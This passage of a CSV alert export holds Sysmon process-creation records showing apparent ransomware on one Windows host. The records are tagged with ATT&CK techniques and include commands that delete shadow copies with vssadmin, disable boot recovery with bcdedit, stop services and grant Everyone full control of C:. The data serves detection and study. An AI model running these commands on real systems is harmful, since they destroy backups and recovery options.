\""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.514619900Z"",""eventRecordID"":""974"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.509\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010551e1a00}\r\nProcessId: 6356\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.509"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010551e1a00}"",""processId"":""6356"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.891",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.415 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010cb161a00} +ProcessId: 6148 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00} +ParentProcessId: 6976 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.448632500Z"",""eventRecordID"":""972"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.415\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010cb161a00}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00}\r\nParentProcessId: 6976\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.415"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010cb161a00}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d164-5ec7-0000-0010bb101a00}"",""parentProcessId"":""6976"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:40.853",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:32.292 +ProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00} +ProcessId: 6976 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:32.302647400Z"",""eventRecordID"":""971"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:32.292\r\nProcessGuid: {df9fc3d3-d164-5ec7-0000-0010bb101a00}\r\nProcessId: 6976\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:32.292"",""processGuid"":""{df9fc3d3-d164-5ec7-0000-0010bb101a00}"",""processId"":""6976"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.206",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. 
+] """,, +"May 23, 2020 @ 12:37:40.145",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.965 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-001044011a00} +ProcessId: 1644 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.988412900Z"",""eventRecordID"":""969"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.965\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-001044011a00}\r\nProcessId: 1644\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.965"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-001044011a00}"",""processId"":""1644"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.121",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.956 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-00105d001a00} +ProcessId: 5712 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.971699300Z"",""eventRecordID"":""968"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.956\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-00105d001a00}\r\nProcessId: 5712\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.956"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-00105d001a00}"",""processId"":""5712"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:40.053",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:31.947 +ProcessGuid: {df9fc3d3-d163-5ec7-0000-0010bfff1900} +ProcessId: 5600 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","icacls \""C:\\*\"" /grant Everyone:F /T /C /Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:31.957005700Z"",""eventRecordID"":""966"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:31.947\r\nProcessGuid: {df9fc3d3-d163-5ec7-0000-0010bfff1900}\r\nProcessId: 5600\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: 
\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:31.947"",""processGuid"":""{df9fc3d3-d163-5ec7-0000-0010bfff1900}"",""processId"":""5600"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C /Q"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:37:39.050",9,"Windows Application 
error event","""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xcf8 +Faulting application start time: 0x01d6303b4d8c5702 +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 79787ffd-717a-4b83-93f1-c28f8f7e0903 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:34.505",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.163 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-0010809c1900} +ProcessId: 3376 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900} +ParentProcessId: 4540 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.170507600Z"",""eventRecordID"":""951"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.163\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-0010809c1900}\r\nProcessId: 3376\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900}\r\nParentProcessId: 4540\r\nParentImage: 